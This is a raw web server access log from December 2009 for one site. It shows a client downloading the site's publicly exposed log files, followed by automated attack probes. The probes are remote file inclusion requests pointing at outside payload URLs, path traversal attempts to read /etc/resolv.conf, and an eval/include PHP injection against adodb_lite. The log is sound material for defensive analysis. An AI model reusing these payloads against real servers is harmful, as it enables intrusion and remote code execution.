64.79.72.114 - - [27/Dec/2009:20:25:39 -0800] "GET /logs/access_091026.log HTTP/1.1" 200 1179648 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:41 -0800] "GET /logs/access_091102.log HTTP/1.1" 200 1114112 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:43 -0800] "GET /logs/access_091109.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:46 -0800] "GET /logs/access_091116.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:48 -0800] "GET /logs/access_091123.log HTTP/1.1" 200 1114112 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:51 -0800] "GET /logs/access_091130.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:53 -0800] "GET /logs/access_091207.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:56 -0800] "GET /logs/access_091214.log HTTP/1.1" 200 1048576 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:00 -0800] "GET /logs/access_091221.log HTTP/1.1" 200 1114112 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:03 -0800] "GET /logs/access_091228.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:05 -0800] "GET /logs/scripts.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:11 -0800] "GET /?D=D HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:11 -0800] "GET /?M=A HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:12 -0800] "GET /?N=A HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:12 -0800] "GET /?S=A HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:13 -0800] "GET /cendoc HTTP/1.1" 301 90 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:13 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:14 -0800] "GET /labia HTTP/1.1" 301 89 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:14 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:16 -0800] "GET /logs HTTP/1.1" 301 88 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:16 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:17 -0800] "GET /tmp HTTP/1.1" 301 87 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:18 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:19 -0800] "GET /?M=D HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:20 -0800] "GET /?S=D HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:21 -0800] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:21 -0800] "GET /cendoc/?M=A HTTP/1.1" 200 526 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:22 -0800] "GET /cendoc/?N=D HTTP/1.1" 200 526 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:23 -0800] "GET /cendoc/?S=A HTTP/1.1" 200 526 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:25 -0800] "GET /labia/?D=A HTTP/1.1" 200 524 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:26 -0800] "GET /labia/?M=A HTTP/1.1" 200 524 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:26 -0800] "GET /labia/?N=D HTTP/1.1" 200 524 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:28 -0800] "GET /labia/?S=A HTTP/1.1" 200 524 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:29 -0800] "GET /logs/?D=A HTTP/1.1" 200 4942 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:29 -0800] "GET /logs/?M=A HTTP/1.1" 200 4942 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:30 -0800] "GET /logs/?N=D HTTP/1.1" 200 4942 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:32 -0800] "GET /logs/?S=A HTTP/1.1" 200 4942 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:33 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:33 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:34 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:26:34 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "Java/1.6.0_17" "www.galf.org"
211.47.237.17 - - [27/Dec/2009:20:27:04 -0800] "GET /logs/access_090706.log/?sourcedir=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [27/Dec/2009:20:27:04 -0800] "GET /?sourcedir=http://lifezi.com/member/one.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [27/Dec/2009:20:27:04 -0800] "GET /logs/?sourcedir=http://lifezi.com/member/one.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:30:25 -0800] "GET /logs/access_090817.log/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:30:25 -0800] "GET /errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:30:25 -0800] "GET /logs/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:30:38 -0800] "GET /errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:30:38 -0800] "GET /logs/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:30:38 -0800] "GET /logs/access_090817.log%20%20/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:31:09 -0800] "GET /logs/access_091130.log%20%20/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:31:12 -0800] "GET /logs/access_091130.log/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:31:42 -0800] "GET /errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:31:42 -0800] "GET /logs/access_090706.log/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:33:11 -0800] "GET /logs/access_090817.log/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:33:11 -0800] "GET /errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:33:11 -0800] "GET /logs/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:33:21 -0800] "GET /errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:33:21 -0800] "GET /logs/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:33:26 -0800] "GET /logs/access_091130.log/errors.php?error=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:42:34 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:42:34 -0800] "GET /logs/access_091123.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:42:34 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:42:34 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:42:34 -0800] "GET /logs/access_091123.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:42:35 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:42:35 -0800] "GET /logs/access_090720.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:42:35 -0800] "GET /logs/access_090720.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:43:14 -0800] "GET /logs/access_091026.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:43:14 -0800] "GET /logs/access_091026.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:43:26 -0800] "GET /logs/access_090713.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:43:27 -0800] "GET /logs/access_090713.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.55.207.101 - - [27/Dec/2009:20:43:40 -0800] "GET /logs/access_090706.log HTTP/1.1" 200 65536 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:43:44 -0800] "GET /logs/access_090817.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:43:45 -0800] "GET /logs/access_090817.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:44:00 -0800] "GET /logs/access_090706.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:44:00 -0800] "GET /logs/access_090706.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:44:31 -0800] "GET /logs/access_090615.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:44:31 -0800] "GET /logs/access_090615.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:44:33 -0800] "GET /logs/access_090824.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:44:53 -0800] "GET /logs/access_090622.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:44:54 -0800] "GET /logs/access_090622.log/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:46:09 -0800] "GET /logs/access_090817.log%20/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:46:09 -0800] "GET /logs/access_090817.log%20/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:46:13 -0800] "GET /logs/access_090824.log%20/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:20:46:13 -0800] "GET /logs/access_090824.log%20/skins/advanced/advanced1.php?pluginpath[0]=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
67.202.75.231 - - [27/Dec/2009:20:46:33 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://riyans.yoll.net/ec.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
67.202.75.231 - - [27/Dec/2009:20:46:33 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://riyans.yoll.net/ec.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
211.232.85.247 - - [27/Dec/2009:20:46:43 -0800] "GET /logs/access_090608.log//_head.php?_zb_path=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [27/Dec/2009:20:46:47 -0800] "GET /logs//_head.php?_zb_path=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:48:52 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:48:52 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:48:52 -0800] "GET /logs/access_090713.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:49:25 -0800] "GET /logs/access_090914.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:49:53 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:49:53 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:20:49:53 -0800] "GET /logs/access_090706.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [27/Dec/2009:20:49:55 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [27/Dec/2009:20:49:55 -0800] "GET /logs/access_090713.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [27/Dec/2009:20:49:55 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [27/Dec/2009:20:51:06 -0800] "GET /logs/access_090914.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [27/Dec/2009:20:51:17 -0800] "GET /logs/access_090914.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [27/Dec/2009:20:51:24 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [27/Dec/2009:20:51:24 -0800] "GET /logs/access_090706.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [27/Dec/2009:20:51:24 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:51:26 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:51:26 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [27/Dec/2009:20:51:26 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:51:28 -0800] "GET /logs/access_090706.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:52:55 -0800] "GET /logs/access_090713.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:52:55 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:52:56 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:53:00 -0800] "GET /logs/access_091026.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:54:53 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:54:53 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:54:53 -0800] "GET /logs/access_090713.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:54:58 -0800] "GET /logs/access_091026.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [27/Dec/2009:20:55:47 -0800] "GET /modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [27/Dec/2009:20:55:47 -0800] "GET /logs/access_090921.log//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [27/Dec/2009:20:55:48 -0800] "GET /logs//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:56:17 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:56:17 -0800] "GET /logs/access_091221.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.27.54 - - [27/Dec/2009:20:56:17 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.34.37.16 - - [27/Dec/2009:20:57:36 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://203.34.37.16/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
203.34.37.16 - - [27/Dec/2009:20:57:38 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://203.34.37.16/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
203.34.37.16 - - [27/Dec/2009:20:57:40 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://203.34.37.16/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
